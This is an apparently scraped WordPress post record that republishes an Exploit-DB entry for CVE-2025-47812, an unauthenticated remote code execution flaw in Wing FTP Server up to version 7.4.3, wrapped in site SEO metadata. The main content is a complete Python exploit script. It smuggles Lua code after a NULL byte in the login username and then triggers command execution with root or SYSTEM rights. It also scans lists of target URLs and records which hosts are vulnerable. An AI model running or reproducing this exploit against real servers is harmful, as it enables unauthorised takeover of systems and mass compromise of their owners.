\n# Exploit Title: Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE)
\n
# CVE: CVE-2025-47812
\n
# Date: 2025-06-30
\n
# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https:\/\/github.com\/4m3rr0r)
\n
# Vendor Homepage: https:\/\/www.wftpserver.com\/
\n
# Version: Wing FTP Server <= 7.4.3\n
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)<\/p>\n
# Description:
\n
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE)
\n
# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the ‘username’
\n
# parameter during login, leading to Lua code injection into session files. These maliciously crafted
\n
# session files are subsequently executed when authenticated functionalities (e.g., \/dir.html) are accessed,
\n
# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows).
\n
# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL)
\n
# and the session creation logic (which uses the full unsanitized username).<\/p>\n
# Proof-of-Concept (Python):
\n
# The provided Python script automates the exploitation process.
\n
# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html.
\n
# Upon successful authentication (even anonymous), a UID cookie is returned.
\n
# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code,
\n
# leading to RCE.<\/p>\n
import requests
\n
import re
\n
import argparse<\/p>\n
# ANSI color codes
\n
RED = “\\033[91m”
\n
GREEN = “\\033[92m”
\n
RESET = “\\033[0m”<\/p>\n
def print_green(text):
\n
print(f”{GREEN}{text}{RESET}”)<\/p>\n
def print_red(text):
\n
print(f”{RED}{text}{RESET}”)<\/p>\n
def run_exploit(target_url, command, username=”anonymous”, verbose=False):
\n
login_url = f”{target_url}\/loginok.html”<\/p>\n
login_headers = {
\n
“Host”: target_url.split(‘\/\/’)[1].split(‘\/’)[0],
\n
“User-Agent”: “Mozilla\/5.0 (X11; Linux x86_64; rv:139.0) Gecko\/20100101 Firefox\/139.0”,
\n
“Accept”: “text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8”,
\n
“Accept-Language”: “en-US,en;q=0.5”,
\n
“Accept-Encoding”: “gzip, deflate, br”,
\n
“Content-Type”: “application\/x-www-form-urlencoded”,
\n
“Origin”: target_url,
\n
“Connection”: “keep-alive”,
\n
“Referer”: f”{target_url}\/login.html?lang=english”,
\n
“Cookie”: “client_lang=english”,
\n
“Upgrade-Insecure-Requests”: “1”,
\n
“Priority”: “u=0, i”
\n
}<\/p>\n
from urllib.parse import quote
\n
encoded_username = quote(username)<\/p>\n
payload = (
\n
f”username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\\”{command}\\”)%0dlocal+r+%3d+h%3aread(\\”*a\\”)”
\n
“%0dh%3aclose()%0dprint(r)%0d–&password=”
\n
)<\/p>\n
if verbose:
\n
print_green(f”[+] Sending POST request to {login_url} with command: ‘{command}’ and username: ‘{username}'”)<\/p>\n
try:
\n
login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10)
\n
login_response.raise_for_status()
\n
except requests.exceptions.RequestException as e:
\n
print_red(f”[-] Error sending POST request to {login_url}: {e}”)
\n
return False<\/p>\n
set_cookie = login_response.headers.get(“Set-Cookie”, “”)
\n
match = re.search(r’UID=([^;]+)’, set_cookie)<\/p>\n
if not match:
\n
print_red(“[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.”)
\n
return False<\/p>\n
uid = match.group(1)
\n
if verbose:
\n
print_green(f”[+] UID extracted: {uid}”)<\/p>\n
dir_url = f”{target_url}\/dir.html”
\n
dir_headers = {
\n
“Host”: login_headers[“Host”],
\n
“User-Agent”: login_headers[“User-Agent”],
\n
“Accept”: login_headers[“Accept”],
\n
“Accept-Language”: login_headers[“Accept-Language”],
\n
“Accept-Encoding”: login_headers[“Accept-Encoding”],
\n
“Connection”: “keep-alive”,
\n
“Cookie”: f”UID={uid}”,
\n
“Upgrade-Insecure-Requests”: “1”,
\n
“Priority”: “u=0, i”
\n
}<\/p>\n
if verbose:
\n
print_green(f”[+] Sending GET request to {dir_url} with UID: {uid}”)<\/p>\n
try:
\n
dir_response = requests.get(dir_url, headers=dir_headers, timeout=10)
\n
dir_response.raise_for_status()
\n
except requests.exceptions.RequestException as e:
\n
print_red(f”[-] Error sending GET request to {dir_url}: {e}”)
\n
return False<\/p>\n
body = dir_response.text
\n
clean_output = re.split(r’<\\?xml', body)[0].strip()\n\n if verbose:\n
print_green(“\\n— Command Output —“)
\n
print(clean_output)
\n
print_green(“———————-“)
\n
else:
\n
if clean_output:
\n
print_green(f”[+] {target_url} is vulnerable!”)
\n
else:
\n
print_red(f”[-] {target_url} is NOT vulnerable.”)<\/p>\n
return bool(clean_output)<\/p>\n
def main():
\n
parser = argparse.ArgumentParser(description=”Exploit script for command injection via login.html.”)
\n
parser.add_argument(“-u”, “–url”, type=str,
\n
help=”Target URL (e.g., http:\/\/192.168.134.130). Required if -f not specified.”)
\n
parser.add_argument(“-f”, “–file”, type=str,
\n
help=”File containing list of target URLs (one per line).”)
\n
parser.add_argument(“-c”, “–command”, type=str,
\n
help=”Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.”)
\n
parser.add_argument(“-v”, “–verbose”, action=”store_true”,
\n
help=”Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.”)
\n
parser.add_argument(“-o”, “–output”, type=str,
\n
help=”File to save vulnerable URLs.”)
\n
parser.add_argument(“-U”, “–username”, type=str, default=”anonymous”,
\n
help=”Username to use in the exploit payload. Default: anonymous”)<\/p>\n
args = parser.parse_args()<\/p>\n
if not args.url and not args.file:
\n
parser.error(“Either -u\/–url or -f\/–file must be specified.”)<\/p>\n
command_to_use = args.command if args.command else “whoami”
\n
verbose_mode = True if args.command else args.verbose<\/p>\n
vulnerable_sites = []<\/p>\n
targets = []
\n
if args.file:
\n
try:
\n
with open(args.file, ‘r’) as f:
\n
targets = [line.strip() for line in f if line.strip()]
\n
except Exception as e:
\n
print_red(f”[-] Could not read target file ‘{args.file}’: {e}”)
\n
return
\n
else:
\n
targets = [args.url]<\/p>\n
for target in targets:
\n
print(f”\\n[*] Testing target: {target}”)
\n
is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode)
\n
if is_vulnerable:
\n
vulnerable_sites.append(target)<\/p>\n
if args.output and vulnerable_sites:
\n
try:
\n
with open(args.output, ‘w’) as out_file:
\n
for site in vulnerable_sites:
\n
out_file.write(site + “\\n”)
\n
print_green(f”\\n[+] Vulnerable sites saved to: {args.output}”)
\n
except Exception as e:
\n
print_red(f”[-] Could not write to output file ‘{args.output}’: {e}”)<\/p>\n
if __name__ == “__main__”:
\n
main()\n<\/div>\n
View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Exploit Details Basic Information Exploit Title Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52347 Type exploitdb Published 2025-07-02T00:00:00 Modified 2025-07-02T00:00:00…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,34,12,40,13,33,7,11,5],"class_list":["post-7501","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n
Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=7501\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52347 Type exploitdb Published 2025-07-02T00:00:00 Modified 2025-07-02T00:00:00...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=7501\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-02T09:34:31+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE)\",\"datePublished\":\"2025-07-02T09:34:31+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501\"},\"wordCount\":113,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7501#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501\",\"name\":\"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-07-02T09:34:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=7501\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=7501#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=7501","og_locale":"en_US","og_type":"article","og_title":"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem","og_description":"Exploit Details Basic Information Exploit Title Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE) Exploit ID EDB-ID:52347 Type exploitdb Published 2025-07-02T00:00:00 Modified 2025-07-02T00:00:00...","og_url":"https:\/\/zero.redgem.net\/?p=7501","og_site_name":"zero redgem","article_published_time":"2025-07-02T09:34:31+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=7501#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=7501"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE)","datePublished":"2025-07-02T09:34:31+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=7501"},"wordCount":113,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=7501#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=7501","url":"https:\/\/zero.redgem.net\/?p=7501","name":"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-07-02T09:34:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=7501#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=7501"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=7501#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Wing FTP Server 7.4.3 – Unauthenticated Remote Code Execution (RCE)"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7501"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/7501\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}